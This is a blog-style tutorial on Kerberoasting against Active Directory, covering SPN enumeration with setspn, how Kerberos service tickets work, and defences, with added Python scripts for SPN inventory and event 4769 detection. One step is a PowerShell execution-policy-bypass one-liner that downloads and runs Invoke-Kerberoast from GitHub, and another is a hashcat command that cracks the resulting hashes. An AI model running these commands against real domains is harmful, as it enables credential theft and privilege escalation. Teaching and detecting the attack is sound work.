
The recent news about the SolarWinds hack, which involved dozens of government agencies, has brought new attention to attacks against service accounts through Kerberos manipulation, known as Kerberoasting.

This is not the only serious attack method against Kerberos, though. ASREPRoasting is another attack on Kerberos that can provide an attacker with the password hashes for Active Directory accounts.

How To Enumerate Service Accounts

The same command used to set the Service Principal Name of an Active Directory account can be used by attackers to identify the accounts with this attribute set. In other words, using the native setspn command can enumerate the domain for existing service accounts.

This behavior is typical of advanced attackers: they use tools built into Windows environments to evade detection rather than importing attack tools, which can be noisy.

Reads, modifies, and deletes the Service Principal Names (SPN) directory property for an Active Directory service account. You use SPNs to locate a target principal name for running a service. You can use setspn to view the current SPNs, reset the account's default SPNs, and add or delete supplemental SPNs.

Source: microsoft.com

Using a low-privilege user who is not a member of the local Administrators group, I can still enumerate the domain, because any authenticated user has the permissions to do so.

C:\Users\bobjones>setspn -T testlab.local -Q */*
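The same enumeration is useful from the defender's side: the output of setspn -Q */* tells you exactly which accounts an attacker would see as Kerberoasting candidates. The script below is an added example, not code from the original post. It parses the output format setspn uses (a DN line followed by tab-indented SPN lines) and flags SPN holders that are not computer objects, which are the accounts whose password strength and rotation need the most attention. The sample output is constructed for the example, and the container-based test for computer accounts is a heuristic that assumes the default domain layout.

```python
"""Inventory accounts that carry SPNs from `setspn -Q */*` output.

Added example (not from the original post). Assumes the setspn output
format: a DN line, then tab-indented SPN lines, then a trailer line.
"""
from collections import defaultdict

# Constructed sample of setspn -Q */* output (not real domain data).
SAMPLE_OUTPUT = """\
Checking domain DC=testlab,DC=local
CN=SQL01,CN=Computers,DC=testlab,DC=local
\tHOST/SQL01
\tHOST/sql01.testlab.local
CN=sqlsvc,CN=Users,DC=testlab,DC=local
\tMSSQLSvc/sql01.testlab.local:1433
\tMSSQLSvc/sql01.testlab.local
CN=DC01,OU=Domain Controllers,DC=testlab,DC=local
\tldap/dc01.testlab.local
CN=websvc,OU=Service Accounts,DC=testlab,DC=local
\tHTTP/intranet.testlab.local
Existing SPN found!
"""

# Containers that hold computer objects by default (assumption: the domain
# keeps the default layout; adjust for a custom OU structure).
COMPUTER_CONTAINERS = ("CN=Computers,", "OU=Domain Controllers,")


def parse_setspn(text):
    """Return {DN: [spn, ...]} for every account listed in setspn -Q output."""
    inventory = defaultdict(list)
    current_dn = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith(("\t", " ")):
            # Indented line: an SPN belonging to the most recent DN.
            if current_dn is not None:
                inventory[current_dn].append(raw.strip())
        elif raw.startswith("CN="):
            current_dn = raw.strip()
            inventory.setdefault(current_dn, [])
        # Anything else ("Checking domain ...", "Existing SPN found!") is
        # a header or trailer line and carries no account data.
    return dict(inventory)


def is_computer_account(dn):
    """Heuristic: the object lives in a container that holds computer objects."""
    return any(marker in dn for marker in COMPUTER_CONTAINERS)


def user_accounts_with_spns(text):
    """SPN holders that are not computer objects: the accounts to review."""
    inventory = parse_setspn(text)
    return {dn: spns for dn, spns in inventory.items()
            if not is_computer_account(dn)}


if __name__ == "__main__":
    for dn, spns in user_accounts_with_spns(SAMPLE_OUTPUT).items():
        print(dn)
        for spn in spns:
            print("   ", spn)
```

Run it against the saved output of setspn from your own domain; every account it lists should have a long, complex password and a known owner, and any that are no longer needed should have their SPNs removed.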

How Kerberos Works

To truly understand how Kerberoasting works you must start with an understanding of how Kerberos authentication works. Since Windows 2000, Windows machines have used Kerberos to authenticate to services across the network.

A user authenticates to a computer on the domain then requests a Ticket Granting Ticket from the KDC which is usually the Active Directory Domain Controller. The process looks something like this:

  • Kerberos authentication uses the Service Principal Name (SPN) to locate the service account behind the service a user is requesting.
  • A user with a valid TGT can request a TGS ticket for that service from the KDC, which is usually the Active Directory Domain Controller.
  • These TGS tickets are encrypted using the NTLM hash of the service account's password (the key used when the ticket is issued with RC4 encryption), which means the ticket can be reformatted and cracked offline by tools like Hashcat and John.

What Is Kerberoasting And How Does Kerberoasting Work?

Most services on a Windows machine are built in and run under system accounts. Kerberoasting is effective where a service runs under a user account whose password was set weakly by a lazy admin and can be cracked easily.

Service accounts are given a service principal name, and when a user requests the service associated with one of them, the Kerberos response can be abused to obtain material encrypted with the service account's password hash. The response from Kerberos is a ticket granting service ticket that is encrypted using the NTLM hash of the service account. This ticket is usually taken offline, and brute forcing tools are used to crack the password for that account.

What does that mean for the attack cycle? If the service account whose password I just cracked is a member of the Domain Admins group, then I can do anything that a domain admin can do on the network.

C:\Users\bobjones>powershell.exe -NoP -NonI -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -ErrorAction SilentlyContinue -OutputFormat Hashcat

To demonstrate how easy Kerberoasting is once you have a foothold, I use Invoke-Kerberoast from the PowerShell Empire GitHub repository to automatically find the available SPNs, request TGS tickets for those services on the network, and output the hashes in a format ready for cracking.

How To Crack Encrypted Kerberos TGS Hashes

Once I have the Kerberos TGS ticket, the part of which is encrypted using the NTLM hash of the service account the user requested, I can use Hashcat to crack the hash.

hashcat -m 13100 hashes.txt -a 6 rockyou.txt ?d?d?d?d

For this example I use Hashcat in mode 13100 (Kerberos 5 TGS-REP etype 23) with the hybrid wordlist + mask attack (-a 6), which tries each wordlist entry followed by four digits, catching the common habit of appending a number to a dictionary word.

I have cracked the service account’s password and can use it to escalate privileges further on the network.

How To Defend Against Kerberoasting

Since Kerberos authentication is built into the Windows environment as the way of brokering authentication in an Active Directory domain, the sad truth is there is not much in the way of corrective actions. There are, however, several preventative measures you can take to secure the domain against Kerberoasting.

  • Make sure service accounts’ passwords are complex and long.
  • Rotate the passwords for service accounts routinely.
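Prevention is only half of it; because Kerberoasting rides on ordinary ticket requests, it is also worth watching for it. The script below is an added example, not code from the original post. It runs detection logic over records of Windows Security event 4769 ("A Kerberos service ticket was requested"), whose fields include the requesting account (TargetUserName), the service (ServiceName) and the ticket encryption type (0x17 is RC4-HMAC, the type whose key is the NTLM hash discussed above; 0x12 is AES256). One account pulling RC4 tickets for several different non-computer services within a few minutes is the pattern a Kerberoasting tool produces. The event lines are constructed in a key=value form for the example; in production you would read the same fields from the event XML.

```python
"""Flag possible Kerberoasting from Windows Security event 4769 records.

Added example (not from the original post). The key=value record format
below is constructed for the example; real 4769 events are XML with the
same field names.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): one account requesting RC4
# tickets for three service accounts within seconds, plus normal traffic.
SAMPLE_EVENTS = """\
2021-01-05T09:14:02 EventID=4769 TargetUserName=bobjones@TESTLAB.LOCAL ServiceName=SQL01$ TicketEncryptionType=0x12 IpAddress=10.0.0.25 Status=0x0
2021-01-05T09:14:03 EventID=4769 TargetUserName=bobjones@TESTLAB.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.0.0.25 Status=0x0
2021-01-05T09:14:03 EventID=4769 TargetUserName=bobjones@TESTLAB.LOCAL ServiceName=websvc TicketEncryptionType=0x17 IpAddress=10.0.0.25 Status=0x0
2021-01-05T09:14:04 EventID=4769 TargetUserName=bobjones@TESTLAB.LOCAL ServiceName=backupsvc TicketEncryptionType=0x17 IpAddress=10.0.0.25 Status=0x0
2021-01-05T09:14:04 EventID=4769 TargetUserName=bobjones@TESTLAB.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.25 Status=0x0
2021-01-05T10:30:11 EventID=4769 TargetUserName=alice@TESTLAB.LOCAL ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=10.0.0.31 Status=0x0
2021-01-05T11:02:45 EventID=4769 TargetUserName=alice@TESTLAB.LOCAL ServiceName=SQL01$ TicketEncryptionType=0x12 IpAddress=10.0.0.31 Status=0x0
"""

RC4_HMAC = "0x17"          # etype 23: ticket key is the account's NT hash
WINDOW = timedelta(minutes=5)
THRESHOLD = 3              # distinct service accounts with RC4 tickets per window


def parse_event(line):
    """Turn one constructed record into a dict with a parsed timestamp."""
    ts_text, *fields = line.split()
    event = {"timestamp": datetime.fromisoformat(ts_text)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def is_roastable_request(event):
    """A successful RC4 ticket for a service that is neither a computer
    account (name ends in $) nor the KDC's own krbtgt account."""
    svc = event.get("ServiceName", "")
    return (event.get("EventID") == "4769"
            and event.get("Status") == "0x0"
            and event.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")


def detect_kerberoasting(text, window=WINDOW, threshold=THRESHOLD):
    """Return {requesting account: set of services} for accounts that obtained
    RC4 tickets for at least `threshold` distinct services inside `window`."""
    by_user = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].append((ev["timestamp"], ev["ServiceName"]))

    alerts = {}
    for user, requests in by_user.items():
        requests.sort()
        start = 0
        # Sliding window over the time-ordered requests of one account.
        for end in range(len(requests)):
            while requests[end][0] - requests[start][0] > window:
                start += 1
            services = {svc for _, svc in requests[start:end + 1]}
            if len(services) >= threshold:
                alerts.setdefault(user, set()).update(services)
    return alerts


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {sorted(services)}")
```

Tune the window and threshold to your environment, since some legitimate applications request tickets for several services at once, and note that the RC4 filter only catches requests that downgrade to RC4: service accounts that are configured for AES only (via msDS-SupportedEncryptionTypes) remove that signal and make the resulting tickets far slower to crack, which is itself a worthwhile hardening step.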

Recommended Reading

I highly recommend buying Georgia Weidman's Penetration Testing. Check the price on Amazon.

Note: As an Amazon associate I may earn from qualifying purchases.
